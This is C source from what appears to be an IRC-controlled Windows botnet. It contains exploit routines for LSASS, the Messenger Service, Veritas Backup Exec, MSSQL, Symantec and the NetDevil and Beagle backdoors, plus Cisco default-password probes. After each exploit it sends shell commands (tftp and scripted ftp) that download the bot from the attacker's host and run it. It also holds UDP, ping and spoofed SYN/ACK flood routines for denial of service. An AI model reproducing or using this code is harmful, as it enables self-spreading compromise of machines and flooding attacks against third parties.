BOOL Symantec(EXINFO exinfo)
{
SOCKET sock;
struct sockaddr_in server;
server.sin_family = AF_INET;
server.sin_addr.s_addr = finet_addr(exinfo.ip);
server.sin_port = fhtons((unsigned short)exinfo.port);
if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) {
return FALSE;
}
if (connect(sock, (struct sockaddr *)&server, sizeof(server)) == SOCKET_ERROR) {
closesocket(sock);
return FALSE;
}
if (send(sock, ShellCode, sizeof(ShellCode), 0) == SOCKET_ERROR) {
closesocket(sock);
return FALSE;
}
closesocket(sock);
if (BuZShell(exinfo,8555)) {
exploit[exinfo.exploit].stats++;
return true;
}
return TRUE;
}
SOCKET CreateSock(char *host, unsigned short port)
{
SOCKET ssock;
if ((ssock = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
return INVALID_SOCKET;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons(port);
IN_ADDR in;
in.s_addr = finet_addr(host);
LPHOSTENT Hostent = NULL;
if (in.s_addr == INADDR_NONE)
Hostent = fgethostbyname(host); //hostname
if (Hostent == NULL && in.s_addr == INADDR_NONE) //error dns
return INVALID_SOCKET;
ssin.sin_addr = ((Hostent != NULL)?(*((LPIN_ADDR)*Hostent->h_addr_list)):(in));
if (fconnect(ssock, (LPSOCKADDR) &ssin, sizeof(ssin)) == SOCKET_ERROR) {
fclosesocket(ssock);
return INVALID_SOCKET;
}
return (ssock);
}
BOOL thcsql(char *target, void* conn,EXINFO exinfo)
{
IRC* irc=(IRC*)conn;
unsigned int sock,rc;
struct sockaddr_in sqludp;
if ((sock=fsocket(AF_INET,SOCK_DGRAM,IPPROTO_UDP))==INVALID_SOCKET)
return FALSE;
sqludp.sin_family=AF_INET;
sqludp.sin_addr.s_addr=finet_addr(exinfo.ip);
sqludp.sin_port=fhtons(exinfo.port);
if ((rc=fconnect(sock, (struct sockaddr *)&sqludp, sizeof(struct sockaddr_in)))=SOCKET_ERROR)
{
if(rc==0)
{
fsend(sock,badbuffer,sizeof(badbuffer)-1,0);
Sleep(1000);
if (ConnectShell(exinfo, 31337))
{
exploit[exinfo.exploit].stats++;
if (!exinfo.silent)
irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
}
else
if (!exinfo.silent && exinfo.verbose)
irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
}
}
fshutdown(sock,1);
fclosesocket(sock);
return FALSE;
}
BOOL CiscoHTTP(EXINFO exinfo)
{
int ret,SocketFD;
char buffer[4096];
if((SocketFD = fsocket(AF_INET, SOCK_STREAM, 0)) < 0) return FALSE;;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons((unsigned short)exinfo.port);
if(fconnect(SocketFD, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
if(fsend(SocketFD, HTTP_REQUEST, strlen(HTTP_REQUEST), 0) < 0)
return FALSE;
memset(buffer, 0, sizeof(buffer));
if((ret = frecv(SocketFD, buffer, sizeof(buffer), 0)) < 0)
return FALSE;
fclosesocket(SocketFD);
if(ret < 5)
return FALSE;
if(strstr(buffer, "HTTP/1.0 200 OK") == NULL || strstr(buffer, "cisco") == NULL)
return FALSE;
char sendbuf[IRCLINE];
_snprintf(sendbuf, sizeof(sendbuf), "-\x03\x34\2cisco(http)\x03\2- found router: %s", exploit[exinfo.exploit].name, exinfo.ip);
irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
addlog(sendbuf);
exploit[exinfo.exploit].stats++;
return TRUE;
}
return FALSE;
}
bool ConnectShell(EXINFO exinfo) {
int len;
struct sockaddr_in shell_addr;
char recvbuf[1024];
SOCKET sockfd;
shell_addr.sin_family = AF_INET;
shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip); // = *((LPIN_ADDR) * lpHostEntry->h_addr_list);
shell_addr.sin_port = fhtons((unsigned short)exinfo.port);;
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == -1 )
return false;
if (fconnect(sockfd, (struct sockaddr *)&shell_addr, sizeof(struct sockaddr)) == -1)
return false;
char mkdir_buff[400]="";
len = frecv(sockfd, recvbuf, 1024, 0);
_snprintf(mkdir_buff, sizeof (mkdir_buff),
"tftp -i %s get %s\n"
"%s\n",
GetIP(exinfo.sock),filename, filename);
if (fsend(sockfd, mkdir_buff, sizeof(mkdir_buff)-1,0) == -1)
return false;
return true;
}
BOOL Cisco(EXINFO exinfo)
{
int ret,SocketFD;
char buffer1[64],buffer2[64];
if((SocketFD = fsocket(AF_INET, SOCK_STREAM, 0)) < 0) return FALSE;;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons((unsigned short)exinfo.port);
if(fconnect(SocketFD, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
memset(buffer1, '\0', 64);
memset(buffer2, '\0', 64);
if ((ret = frecv(SocketFD, buffer1, 64, 0)) > 0)
{
ret = frecv(SocketFD, buffer1, 64, 0);
fsend(SocketFD,"cisco\r",6,0);
ret = frecv(SocketFD, buffer2, 64, 0);
if( (memcmp(buffer2,"\r\nPass",6)) && !(memcmp(buffer1,"\r\n\r\nUser Access Verification\r\n\r\nPassword",40)))
{
char sendbuf[IRCLINE];
_snprintf(sendbuf, sizeof(sendbuf), "-\x03\x34\2cisco(telnet)\x03\2- found router: %s", exploit[exinfo.exploit].name, exinfo.ip);
irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
addlog(sendbuf);
exploit[exinfo.exploit].stats++;
return TRUE;
}
}
}
return FALSE;
}
// function for sending udp packets
DWORD WINAPI udp(LPVOID param)
{
PINGFLOOD udp = *((PINGFLOOD *)param);
PINGFLOOD *udps = (PINGFLOOD *)param;
udps->gotinfo = TRUE;
char sendbuf[IRCLINE], pbuff[MAXPINGSIZE];
int i;
srand(GetTickCount());
SOCKET usock = fsocket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
IN_ADDR iaddr;
iaddr.s_addr = finet_addr(udp.host);
LPHOSTENT hostent = NULL;
if (iaddr.s_addr == INADDR_NONE)
hostent = fgethostbyname(udp.host);
if (hostent == NULL && iaddr.s_addr == INADDR_NONE) {
sprintf(sendbuf,"[UDP]: Error sending pings to %s.", udp.host);
if (!udp.silent) irc_privmsg(udp.sock, udp.chan, sendbuf, udp.notice);
addlog(sendbuf);
clearthread(udp.threadnum);
ExitThread(1);
}
ssin.sin_addr = ((hostent != NULL)?(*((LPIN_ADDR)*hostent->h_addr_list)):(iaddr));
ssin.sin_port = ((udp.port == 0)?(fhtons((unsigned short)((rand() % MAXPINGSIZE) + 1))):(fhtons((unsigned short)udp.port)));
if (udp.port < 1)
udp.port = 1;
if (udp.port > MAXUDPPORT)
udp.port = MAXUDPPORT;
udp.num = udp.num / 10;
if (udp.delay == 0)
udp.delay = 1;
for (i = 0; i < udp.size; i++)
pbuff[i] = (char)(rand() % 255);
while (udp.num-- > 0) {
//change port every 10 packets (if one isn't specified)
for (i = 0; i < 11; i++) {
fsendto(usock, pbuff, udp.size-(rand() % 10), 0, (LPSOCKADDR)&ssin, sizeof(ssin));
Sleep(udp.delay);
}
if (udp.port == 0)
ssin.sin_port = fhtons((unsigned short)((rand() % MAXPINGSIZE) + 1));
}
sprintf(sendbuf,"[UDP]: Finished sending packets to %s.", udp.host);
if (!udp.silent) irc_privmsg(udp.sock, udp.chan, sendbuf, udp.notice);
addlog(sendbuf);
clearthread(udp.threadnum);
ExitThread(0);
}
BOOL lsass(EXINFO exinfo)
{
int len;
SOCKET sockfd;
int dport = 44444;
struct sockaddr_in their_addr;
char recvbuf[1600];
{
their_addr.sin_family = AF_INET;
their_addr.sin_addr.s_addr = finet_addr(exinfo.ip); // = *((LPIN_ADDR) * lpHostEntry->h_addr_list);
/* ^ Server's address */
their_addr.sin_port = fhtons((unsigned short)exinfo.port);
/* connect to the server */
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
return FALSE;
if (fconnect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == SOCKET_ERROR)
return FALSE;
if (fsend(sockfd, req1, sizeof(req1)-1, 0) == -1)
return FALSE;
len = frecv(sockfd, recvbuf, 1600, 0);
if (fsend(sockfd, req2, sizeof(req2)-1, 0) == -1)
return FALSE;
len = frecv(sockfd, recvbuf, 1600, 0);
if (fsend(sockfd, req3, sizeof(req3)-1, 0) == -1)
return FALSE;
len = frecv(sockfd, recvbuf, 1600, 0);
switch (recvbuf[68]) {
case '1': // win XP
if (!Exploit2( exinfo, sockfd, 0 ))
return FALSE;
break;
case '0': //win 2k
if (!Exploit2( exinfo, sockfd, 2 ))
if (!Exploit2( exinfo, sockfd, 1))
return FALSE;
break;
default:
return FALSE;
}
}
return TRUE;
}
BOOL MessengerService(EXINFO exinfo)
{
int sockUDP,ver,packetsz;
unsigned char packet[8192];
struct sockaddr_in targetUDP;
struct
{
char os[30];
DWORD SEH;
DWORD JMP;
} targetOS[] =
{
{
"Windows 2000 SP 3 (en)",
0x77ee044c, // unhandledexceptionfilter pointer
0x768d693e // cryptsvc.dll call [esi+48] 0x768d693e
},
{
"Windows XP SP 1 (en)",
0x77ed73b4,
0x7804bf52 //rpcrt4.dll call [edi+6c]
}
};
int TargetOS = FpHost(exinfo.ip, FP_RPC);
if ((TargetOS == OS_WINNT) || (TargetOS == OS_UNKNOWN)) return FALSE;
if (TargetOS == OS_WIN2K) ver = 0;
if (TargetOS == OS_WINXP) ver = 1;
ZeroMemory(&targetUDP, sizeof(targetUDP));
targetUDP.sin_family = AF_INET;
targetUDP.sin_addr.s_addr = finet_addr(exinfo.ip);
targetUDP.sin_port = fhtons(exinfo.port);
packetsz = PreparePacket((char*)packet,sizeof(packet),targetOS[ver].JMP,targetOS[ver].SEH);
if ((sockUDP = fsocket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1)
{
return FALSE;
}
if (fsendto(sockUDP, (char*)packet, packetsz, 0, (struct sockaddr *)&targetUDP, sizeof(targetUDP)) == -1)
{
return FALSE;
}
fclosesocket(sockUDP);
Sleep(500);
if (ConnectShellEx(exinfo, 9191) == true) {
exploit[exinfo.exploit].stats++;
return TRUE;
}
return FALSE;
}
BOOL NetDevil(EXINFO exinfo)
{
char buffer[IRCLINE];
DWORD mode=0;
SOCKET ssock;
if ((ssock = fsocket(AF_INET,SOCK_STREAM,0)) == INVALID_SOCKET)
return FALSE;
SOCKADDR_IN sin;
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = finet_addr(exinfo.ip);
sin.sin_port = fhtons(exinfo.port);
fconnect(ssock,(LPSOCKADDR)&sin,sizeof(sin));
fioctlsocket(ssock,FIONBIO,&mode);
for (int i=0; passwords[i]; i++) {
Sleep(50);
memset(buffer,0,sizeof(buffer));
if (NetDevil_Receive(ssock) == -1)
break;
if (frecv(ssock, buffer, sizeof(buffer), 0) <= 0)
break;
if (strcmp(buffer,"passed") == 0) {
sprintf(buffer,"nd %s %s",exinfo.ip ,passwords[i-1]);
fsend(ssock, buffer, strlen(buffer), 0);
if (NetDevil_Upload(exinfo.ip,ssock) == 1) {
fclosesocket(ssock);
_snprintf(buffer,sizeof(buffer),"[%s]: Exploiting IP: %s, Password: (%s)",exploit[exinfo.exploit].name,exinfo.ip,((strcmp(passwords[i-i],"")==0)?("(no password)"):(passwords[i-1])));
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
return TRUE;
}
break;
}
if (strcmp(buffer,"pass_pleaz") == 0) {
memset(buffer,0,sizeof(buffer));
sprintf(buffer,"pass_pleaz%s",passwords[i]);
fsend(ssock,buffer ,strlen(buffer), 0);
continue;
}
else break;
}
fclosesocket(ssock);
return FALSE;
}
BOOL SkonkShell( EXINFO exinfo, unsigned int bindport ) {
int len;
char recvbuf[1024];
SOCKET sockfd;
SOCKADDR_IN shell_addr;
memset(&shell_addr, 0, sizeof(shell_addr));
shell_addr.sin_family = AF_INET;
shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip);
shell_addr.sin_port = fhtons(bindport);
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET )
return false;
if (fconnect(sockfd, (LPSOCKADDR)&shell_addr, sizeof(shell_addr)) == SOCKET_ERROR)
return false;
char mkdir_buff[400];
len = frecv(sockfd, recvbuf, 1024, 0);
//////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////
#ifndef NO_TFTPD
_snprintf(mkdir_buff, sizeof (mkdir_buff),
"tftp -i %s get %s &%s\r\n",
GetIP( exinfo.sock ),filename, filename);
#endif
//////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
Sleep(500);
_snprintf(mkdir_buff, sizeof (mkdir_buff), "%s\r\n", filename);
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
len = frecv(sockfd, recvbuf, 1024, 0);
fclosesocket(sockfd);
return true;
}
// function for sending pings
DWORD WINAPI ping(LPVOID param)
{
char sendbuf[IRCLINE], pbuff[MAXPINGSIZE];
unsigned long ip;
PINGFLOOD ping = *((PINGFLOOD *)param);
PINGFLOOD *pings = (PINGFLOOD *)param;
pings->gotinfo = TRUE;
HANDLE icmp = (HANDLE)fIcmpCreateFile();
IN_ADDR iaddr;
iaddr.s_addr = finet_addr(ping.host);
LPHOSTENT hostent = NULL;
if (iaddr.s_addr == INADDR_NONE)
hostent = fgethostbyname(ping.host);
if ((hostent == NULL && iaddr.s_addr == INADDR_NONE) || icmp == INVALID_HANDLE_VALUE) {
sprintf(sendbuf,"[PING]: Error sending pings to %s.", ping.host);
if (!ping.silent) irc_privmsg(ping.sock, ping.chan, sendbuf, ping.notice);
addlog(sendbuf);
clearthread(ping.threadnum);
ExitThread(1);
}
if (hostent != NULL)
ip = *(DWORD*)*hostent->h_addr_list;
else
ip = iaddr.s_addr;
ICMP_ECHO_REPLY reply;
memset(&reply, 0, sizeof(reply));
reply.RoundTripTime = 0xffffffff;
if (ping.size > MAXPINGSIZE)
ping.size = MAXPINGSIZE;
if (ping.delay < 1)
ping.delay = 1;
for (int i = 0; i < ping.num; i++)
fIcmpSendEcho(icmp, ip, pbuff, ping.size, NULL, &reply, sizeof(ICMP_ECHO_REPLY), ping.delay);
fIcmpCloseHandle(icmp);
sprintf(sendbuf,"[PING]: Finished sending pings to %s.", ping.host);
if (!ping.silent) irc_privmsg(ping.sock, ping.chan, sendbuf, ping.notice);
addlog(sendbuf);
clearthread(ping.threadnum);
ExitThread(0);
}
int check_os(char *host,unsigned short target_port, int *sp)
{
SOCKET sSock;
if ((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(host);
ssin.sin_port = fhtons((unsigned short)target_port);
if (fconnect(sSock,(LPSOCKADDR)&ssin,sizeof(ssin)) != SOCKET_ERROR) {
char recv_buff[5000];
memset(recv_buff,0,sizeof(recv_buff));
TIMEVAL timeout;
timeout.tv_sec = 5;
timeout.tv_usec = 0;
fd_set fd;
FD_ZERO(&fd);
FD_SET(sSock, &fd);
if (fselect(0, &fd, NULL, NULL, &timeout) > 0) {
if (frecv(sSock,recv_buff,sizeof(recv_buff),0) > 0) {
if (fsend(sSock,(const char *)send_buff,strlen((const char*)send_buff),0) > 0) {
if (frecv(sSock,recv_buff,sizeof(recv_buff),0) > 0) {
fclosesocket(sSock);
*sp=atoi(&recv_buff[37]);
if (recv_buff[8] == 5 && recv_buff[12] == 0)
return ID_WIN2K;
else if (recv_buff[8] == 5 && recv_buff[12] == 1)
return ID_WINXP;
else if (recv_buff[8] == 5 && recv_buff[12] == 2)
return ID_WIN2K3;
else if (recv_buff[8] == 4)
return ID_WINNT;
else
return ID_UNKNOWN;
}
}
}
}
}
fclosesocket(sSock);
}
return 1;
}
bool ConnectShell2(EXINFO exinfo) {
int len;
char recvbuf[1024];
SOCKET sockfd;
SOCKADDR_IN shell_addr;
memset(&shell_addr, 0, sizeof(shell_addr));
shell_addr.sin_family = AF_INET;
shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip); // = *((LPIN_ADDR) * lpHostEntry->h_addr_list);
shell_addr.sin_port = fhtons(xport);;
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET )
return false;
if (fconnect(sockfd, (LPSOCKADDR)&shell_addr, sizeof(shell_addr)) == SOCKET_ERROR)
return false;
char mkdir_buff[400];
len = frecv(sockfd, recvbuf, 1024, 0);
#ifndef NO_TFTPD
_snprintf(mkdir_buff, sizeof (mkdir_buff),
"tftp -i %s get %s\r\n",
GetIP(exinfo.sock),filename, filename);
#endif
#ifndef NO_FTPD
_snprintf(mkdir_buff, sizeof (mkdir_buff),
"echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &%s\r\n",
GetIP(exinfo.sock),FTP_PORT, filename, filename);
#endif
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
Sleep(500);
_snprintf(mkdir_buff, sizeof (mkdir_buff), "%s\r\n", filename);
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
len = frecv(sockfd, recvbuf, 1024, 0);
fclosesocket(sockfd);
return true;
}
BOOL Beagle(EXINFO exinfo)
{
char *BeagleAuth, buffer[IRCLINE], botfile[MAX_PATH], fname[_MAX_FNAME], ext[_MAX_EXT];
BOOL success = FALSE;
WSADATA WSAData;
if (fWSAStartup(MAKEWORD(1,1), &WSAData)!=0)
return FALSE;
SOCKET sSock;
if((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons(exinfo.port);
if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
BeagleAuth = ((strcmp(exinfo.command, "beagle1") == 0)?(BeagleAuth1):(BeagleAuth2));
if(fsend(sSock, BeagleAuth, sizeof(BeagleAuth), 0) != SOCKET_ERROR) {
if (frecv(sSock, buffer, 8, 0) != SOCKET_ERROR) {
GetModuleFileName(0, botfile, sizeof(botfile));
_splitpath(botfile, NULL, NULL, fname, ext);
_snprintf(botfile, sizeof(botfile), "%s%s", fname, ext);
_snprintf(buffer,sizeof(buffer),"http://%s:%s/%s", GetIP(sSock), httpport, botfile);
if(fsend(sSock, buffer, sizeof(buffer), 0))
success = TRUE;
}
}
}
}
fclosesocket(sSock);
fWSACleanup();
if (success) {
_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
}
return (success);
}
// FIX ME: This could probably be (re)moved, its just from the original exploit layout.
int WksSocket(int tm, int port, const char *WksIP) {
unsigned int sock;
unsigned long y = 1;
struct timeval timeout;
struct sockaddr_in target_ip;
if ((sock = fsocket(AF_INET, SOCK_STREAM, 0)) == -1)
return -1;
target_ip.sin_family = AF_INET;
target_ip.sin_addr.s_addr = finet_addr(WksIP);
target_ip.sin_port = fhtons(port);
fioctlsocket(sock,FIONBIO,&y);
timeout.tv_sec=tm;
timeout.tv_usec = 0;
if (fconnect(sock, (struct sockaddr *)&target_ip, sizeof(target_ip)) == -1)
{
fd_set writefds;
fd_set exceptfds;
FD_ZERO (&writefds);
FD_ZERO (&exceptfds);
FD_SET (sock, &writefds);
FD_SET (sock, &exceptfds);
fselect(0, NULL, &writefds, &exceptfds, &timeout);
//if (!FDI_ISSET (sock, &writefds))
if (!__fWSAFDIsSet(sock, &writefds))
{
fclosesocket(sock);
return -1;
}
y=0;
fioctlsocket(sock,FIONBIO,&y);
}
return sock;
}
bool ConnectShell2(EXINFO exinfo) {
int len;
char recvbuf[1024];
SOCKET sockfd;
SOCKADDR_IN shell_addr;
memset(&shell_addr, 0, sizeof(shell_addr));
shell_addr.sin_family = AF_INET;
shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip);
shell_addr.sin_port = fhtons(7777);
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET )
return false;
if (fconnect(sockfd, (LPSOCKADDR)&shell_addr, sizeof(shell_addr)) == SOCKET_ERROR)
return false;
char mkdir_buff[400];
len = frecv(sockfd, recvbuf, 1024, 0);
_snprintf(mkdir_buff, sizeof (mkdir_buff),
"echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n",
GetIP(exinfo.sock),FTP_PORT);
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
Sleep(500);
_snprintf(mkdir_buff, sizeof (mkdir_buff), "%s\r\n", filename);
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
len = frecv(sockfd, recvbuf, 1024, 0);
fclosesocket(sockfd);
return true;
}
bool veritasbackupserver(EXINFO exinfo) {
SOCKET sock;
if ((sock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == SOCKET_ERROR) return false;
SOCKADDR_IN sin;
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = fhtons((unsigned short)exinfo.port);
sin.sin_addr.s_addr = finet_addr(exinfo.ip);
char payload[800];
char v91sp0sp1[]="\xFF\x50\x11\x40";
char esisp0sp1[]="\xA1\xFF\x42\x01";
memcpy(&talk[37], &v91sp0sp1, 4);
memcpy(&talk[72], &esisp0sp1, 4);
//os="Backup Exec v9.1.4691.1\n[+] Backup Exec v9.1.4691.0";
strcpy(payload,veritassc);
if (fconnect(sock, (LPSOCKADDR)&sin, sizeof(sin)) == SOCKET_ERROR) return false;
if (fsend(sock,talk,sizeof(talk)-1,0)==SOCKET_ERROR) return false;
Sleep(10);
for (int i=0; i < 7;i++) {
if (fsend(sock,payload,sizeof(payload),0) == SOCKET_ERROR) return false;
Sleep(10);
}
Sleep(1000);
fclosesocket(sock);
ConnectShell(exinfo,101);
return (AddEx(exinfo,true));
}
DWORD WINAPI AdvScanner(LPVOID param)
{
char buffer[LOGLINE];
//char szSelfExe[MAX_PATH];
ADVSCAN scan = *((ADVSCAN *)param);
ADVSCAN *scanp = (ADVSCAN *)param;
scanp->gotinfo = TRUE;
advinfo[scan.threadnum].ip = finet_addr(scan.ip);
/*
// FIX ME: Make this a standalone function
if (!FileExists(szLocalPayloadFile)) {
GetModuleFileName(0,szSelfExe,MAX_PATH);
CopyFile(szSelfExe,szLocalPayloadFile,FALSE);
// FIX ME: Make this copy to the same directory (could affect other stuff)
}
*/
CheckServers(scan);
if (findthreadid(SCAN_THREAD) == 1) {
DeleteCriticalSection(&CriticalSection); // just in case
if (!InitializeCriticalSectionAndSpinCount(&CriticalSection, 0x80000400)) {
// failed to initialize CriticalSection
sprintf(buffer,"[SCAN]: Failed to initialize critical section.");
if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
addlog(buffer);
return 0;
}
}
advinfo[scan.threadnum].info = TRUE;
for (unsigned int i=1;i<=(scan.threads);i++) {
scan.cthreadid = i;
sprintf(buffer,"[SCAN]: %s:%d, Scan thread: %d, Sub-thread: %d.",scan.ip, scan.port,scan.threadnum,scan.cthreadid);
scan.cthreadnum = addthread(buffer,SCAN_THREAD,NULL);
threads[scan.cthreadnum].parent = scan.threadnum;
if (threads[scan.cthreadnum].tHandle = CreateThread(0,0,&AdvPortScanner,(LPVOID)&scan,0,0)) {
while (scan.cgotinfo == FALSE)
Sleep(30);
} else {
sprintf(buffer, "[SCAN]: Failed to start worker thread, error: <%d>.", GetLastError());
addlog(buffer);
}
Sleep(30);
}
if (scan.minutes != 0)
Sleep(60000*scan.minutes);
else
while (advinfo[scan.threadnum].info == TRUE) Sleep(2000);
IN_ADDR in;
in.s_addr = advinfo[scan.threadnum].ip;
sprintf(buffer,"[SCAN]: Finished at %s:%d after %d minute(s) of scanning.", finet_ntoa(in), scan.port, scan.minutes);
if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
addlog(buffer);
advinfo[scan.threadnum].info = FALSE;
Sleep(3000);
if (findthreadid(SCAN_THREAD) == 1)
DeleteCriticalSection(&CriticalSection);
clearthread(scan.threadnum);
ExitThread(0);
}
DWORD WINAPI TcpFloodThread(LPVOID param)
{
TCPFLOOD tcpflood = *((TCPFLOOD *)param);
TCPFLOOD *tcpfloods = (TCPFLOOD *)param;
tcpfloods->gotinfo = TRUE;
char sendbuf[IRCLINE], szSendBuf[60]={0};
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
srand(GetTickCount());
SOCKET ssock;
if ((ssock=fsocket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == INVALID_SOCKET) {
sprintf(sendbuf,"[TCP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
BOOL flag = TRUE;
if (fsetsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) {
sprintf(sendbuf,"[TCP]: Error: setsockopt() failed, returned: <%d>.", fWSAGetLastError());
if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
if (finet_addr(tcpflood.ip) == INADDR_NONE) {
sprintf(sendbuf,"[TCP]: Invalid target IP.");
if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family=AF_INET;
ssin.sin_port=fhtons(0);
ssin.sin_addr.s_addr=finet_addr(tcpflood.ip);
int sent = 0;
unsigned long start = GetTickCount();
while (((GetTickCount() - start) / 1000) <= (unsigned long)tcpflood.time) {
ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader));
ipHeader.ident=1;
ipHeader.frag_and_flags=0;
ipHeader.ttl=128;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.sourceIP=((tcpflood.spoof)?(rand()+(rand()<<8)+(rand()<<16)+(rand()<<24)):(finet_addr(GetIP(tcpflood.sock))));
ipHeader.destIP=ssin.sin_addr.s_addr;
((tcpflood.port == 0)?(tcpHeader.dport=fhtons((unsigned short)(rand()%1025))):(tcpHeader.dport=fhtons(tcpflood.port)));
tcpHeader.sport=fhtons((unsigned short)(rand()%1025));
tcpHeader.seq=fhtonl(0x12345678);
if (strstr(tcpflood.type,"syn")) {
tcpHeader.ack_seq=0;
tcpHeader.flags=SYN;
} else if (strstr(tcpflood.type,"ack")) {
tcpHeader.ack_seq=0;
tcpHeader.flags=ACK;
} else if (strstr(tcpflood.type,"random")) {
tcpHeader.ack_seq=rand()%3;
((rand()%2 == 0)?(tcpHeader.flags=SYN):(tcpHeader.flags=ACK));
}
tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.window=fhtons(512);
tcpHeader.urg_ptr=0;
tcpHeader.checksum=0;
psdHeader.saddr=ipHeader.sourceIP;
psdHeader.daddr=ipHeader.destIP;
psdHeader.zero=0;
psdHeader.proto=IPPROTO_TCP;
psdHeader.length=fhtons((unsigned short)(sizeof(tcpHeader)));
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4);
ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
if (fsendto(ssock, (char *)&szSendBuf, sizeof(szSendBuf), 0, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) {
fclosesocket(ssock);
